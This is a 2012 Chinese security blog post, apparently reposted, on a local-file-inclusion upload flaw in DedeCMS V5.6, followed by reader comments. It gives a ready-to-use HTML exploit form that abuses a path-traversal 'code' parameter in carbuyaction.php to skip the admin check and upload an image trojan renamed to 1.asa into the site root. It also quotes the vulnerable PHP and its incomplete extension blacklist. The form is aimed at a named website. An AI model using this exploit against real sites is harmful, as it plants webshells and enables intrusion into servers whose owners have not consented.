您的位置 » 首页 » 实用工具 » DedeCmsV5.6 本地包含里的上传漏洞

DedeCmsV5.6 本地包含里的上传漏洞

发表于5年前 | 作者: seay | 分类: 实用工具 | 孵化于:2012年08月21日 | 文章热度:12,039 次 全屏阅读

显示不全请点击全屏阅读

之前就发现了这本地包含上传漏洞的利用方法:

<form action=”http://www.8090Sec.com/plus/carbuyaction.php?dopost=return&action=xxx&code=../../include/dialog/select_soft_post” method=”post” enctype=”multipart/form-data” name=”QuickSearch” id=”QuickSearch”>
<input type=”hidden” name=”newname” value=”1.asa”>
<input type=”file” name=”uploadfile”>
<input type=”submit” value=”搜索” name=”QuickSearchBtn”>
</form>

上传一个图片木马(只改后辍名为图片类型就行),即可在网站根目录生成 1.asa 文件

简单分析:

文件:select_soft_post.php

<?php
if(!isset($cfg_basedir))
{
        include_once(dirname(__FILE__).’/config.php’);
}
//config.php 是用于验证是否管理员。由于本地包含, $cfg_basedir 已经设置了值,应该跳过了验证。
//文件名(前为手工指定, 后者自动处理)
if(!empty($newname))
{
        $filename = $newname;
        if(!ereg(“.”, $filename)) $fs = explode(‘.’, $uploadfile_name);
        else $fs = explode(‘.’, $filename);
        if(eregi($cfg_not_allowall, $fs[count($fs)-1]))
        {
                ShowMsg(“你指定的文件名被系统禁止!”,’javascript:;’);
                exit();
        }
        if(!ereg(“.”, $filename)) $filename = $filename.’.’.$fs[count($fs)-1];
}else{
        $filename = $cuserLogin->getUserID().’-‘.dd2char(MyDate(‘ymdHis’,$nowtme));
        $fs = explode(‘.’, $uploadfile_name);
        if(eregi($cfg_not_allowall, $fs[count($fs)-1]))
        {
                ShowMsg(“你上传了某些可能存在不安全因素的文件,系统拒绝操作!”,’javascript:;’);
                exit();
        }
        $filename = $filename.’.’.$fs[count($fs)-1];
}

问题就出在 $newname 那里,没验证上传类型,但验证了非可上传类型

//这里强制限定的某些文件类型禁止上传
$cfg_not_allowall = “php|pl|cgi|asp|aspx|jsp|php3|shtm|shtml”;

即可以上传非上面类型的文件,有时也并不鸡肋。。

摘自:人生注入点博客

Tags:

DedeCmsV5.6漏洞,

如果您喜欢我的博客,欢迎点击图片定订阅到邮箱填写您的邮件地址,订阅我们的精彩内容: 也可以点击链接【订阅到鲜果】

如果我的想法或工具帮助到了你,也可微信扫下方二维码打赏本人一杯咖啡


来自 Seay互联网安全博客
本文地址:http://www.cnseay.com/671/
文章版权说明请看置顶文章,尊重作者,转载请以链接形式标明原文地址

马上分享给你的朋友吧~

已经有4个筒子的人留下了脚印...

  • seay 说:
    1楼
    2012 年 9 月 5 日 下午 3:11 回复

    测试

  • 【管理员】Seay 说:
    2楼
    2012 年 9 月 5 日 下午 3:14 回复

    @seay
    再次测试

  • ixiaoye 说:
    3楼
    2012 年 9 月 9 日 上午 3:57 回复

    其实是一个老漏洞 2010年时就有出来 上面那个利用工具有点问题啊 没有上传的地方 不知道是不是我弄的有错

  • 【管理员】Seay 说:
    4楼
    2012 年 9 月 9 日 上午 4:13 回复

    @ixiaoye
    嗯,是的,要看的是原理

发表评论

你的大名(必填)

你的邮箱(必填)

评论内容(必填)